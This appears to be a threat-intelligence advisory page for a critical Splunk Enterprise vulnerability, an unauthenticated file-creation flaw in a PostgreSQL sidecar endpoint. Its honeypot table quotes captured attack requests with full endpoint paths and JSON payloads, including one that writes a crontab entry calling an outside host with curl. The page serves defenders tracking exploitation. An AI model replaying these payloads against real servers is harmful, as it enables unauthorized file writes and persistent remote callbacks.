Critical
CVE-2026-20253
PUBLISHED
Unauthenticated Arbitrary File Creation and Truncation in a PostgreSQL Sidecar Service Endpoint in Splunk Enterprise
Not yet in CISA KEV
- Vendor: Splunk
- Product: Splunk Enterprise, Splunk Cloud Platform
- Published: Jun 10, 2026
- EPSS: 0.1% · 21% pctl
Description
In Splunk Enterprise versions below 10.2.4 and 10.0.7, and Splunk Cloud Platform versions below 10.4.2604.3 and 10.2.2510.14, an unauthenticated user could create or truncate arbitrary files through a PostgreSQL sidecar service endpoint. The vulnerability exists because the PostgreSQL sidecar service endpoint lacks authentication controls, allowing any network-reachable user to invoke file operations without credentials.
Weaknesses (CWE)
- Missing Authentication for Critical Function
CVSS Scores
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploitation Status
Exploited in the wild
Recorded 2026-06-15 05:15:25 UTC · KEVIntel
Active exploitation observed
Recorded 2026-06-15 05:15:25 UTC · KEVIntel sensor
Proof of concept available
Recorded 2026-06-12 10:04:32 UTC · GitHub
Observed Exploitation Attempts
Exploitation attempts against this vulnerability observed first-hand by KEVIntel private honeypots over the last 30 days.
- Attempts Observed: 55
- Unique Attacker IPs: 11
- Attacker Countries: 🇫🇷 🇭🇰 🇰🇷 🇸🇬 🇺🇸 🇻🇳
- Sensors Observed: 2
Exploitation Attempts Over the Last 30 Days
First observed 2026-06-15 05:15 UTC · Last observed 2026-06-15 16:25 UTC
Recent Attempts
Showing observations from the last 30 days.
| Attack Time | Attacker | Sensor | Request | Confidence | Raw Event |
|---|---|---|---|---|---|
| 2026-06-15 05:16 UTC | 🇺🇸 45.198.224.26, United States (seen 11 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/backup`, User-Agent `python-requests/2.31.0` | High | Payload fingerprint: sha256:f46b190bfac2bd8e7900a793287fc02664e22c45674e4827f284dee69388a930. Payload: `{"database": "search_metadata", "backupFile": "test"}`. Source: KEVIntel Honeypot |
| 2026-06-15 05:16 UTC | 🇫🇷 62.210.127.48, Paris, Île-de-France, France (seen 4 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/restore`, User-Agent `python-requests/2.34.0` | High | Payload fingerprint: sha256:d577b52cb0f0baed88dae23a1057fc4d8ddde7a18013ae27ceb5970b60bba745. Payload: `{"database": "search_metadata", "backupFile": "/var/spool/cron/crontabs/splunk", "passfile": "/opt/splunk/var/packages/data/postgres/.pgpass", "_raw": "* * * * * curl http://thi9a5fw.requestrepo.com\n"}`. Source: KEVIntel Honeypot |
| 2026-06-15 05:16 UTC | 🇺🇸 45.198.224.26, United States (seen 11 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/restore`, User-Agent `curl/8.5.0` | High | Payload fingerprint: sha256:0d15e0d69981a532a4817417a639cb6c2f5625b083a38c035243838749007ee6. Payload: `{ database\:\search_metadata\,\backupFile\:\test\}`. Source: KEVIntel Honeypot |
| 2026-06-15 05:15 UTC | 🇺🇸 45.198.224.26, United States (seen 11 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/backup`, User-Agent `curl/8.5.0` | High | Payload fingerprint: sha256:acc736d13c18bc5d84377f3a89fca3758c68f8789cb41863c112573c2e084b38. Payload: `{\database\:\hostaddr=45.198.224.26 dbname=pwn\,\backupFile\:\/tmp/poc\}`. Source: KEVIntel Honeypot |
| 2026-06-15 05:15 UTC | 🇺🇸 45.198.224.26, United States (seen 11 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/backup`, User-Agent `curl/8.5.0` | High | Payload fingerprint: sha256:150bf2cee9904dd1f9f5eaae3637ac985a8d3073249c660a2763b71835df038f. Payload: `{ database\:\search_metadata\,\backupFile\:\test\}`. Source: KEVIntel Honeypot |
Known Exploited Vulnerability Sources
Catalogues that list this CVE as a known exploited vulnerability.
| Source | Added |
|---|---|
| KEVIntel First | 2026-06-15 05:15 UTC |
Scanner Integrations
| Scanner | Reference | Detected |
|---|---|---|
| Nuclei | https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2026/CVE-2026-20253.yaml | Jun 15, 2026 |
Recent Mentions
TheHackerNews · Jun 13, 2026
Splunk has released security updates to address a critical security flaw in Splunk Enterprise that could be exploited to conduct unauthenticated file operations and even remote code execution. The vulnerability, tracked as CVE-2026-20253, is rated 9.8 on the CVSS scoring system. "In Splunk Enterprise versions below 10.2.4 and 10.0.7, an unauthenticated user could create or truncate arbitrary
Watchtower Labs · Jun 12, 2026
Three posts? In three days? Are we insane? We're home alone, there's no one to stop us, and we're up past bedtime. So, we need to talk about Splunk. On June 10th, Splunk published this CVE-2026-20253 advisory: It has everything that we
Potential Proof of Concepts
These PoCs are unverified and could contain malware. Use at your own risk.
github · Created 2026-06-12 10:04:32 UTC · 2 stars
nuclei · Created Unknown
Timeline
- Added to KEVIntel
- Detected by Nuclei
- Proof of Concept Exploit Available
- CVE Published to Public
- CVE ID Reserved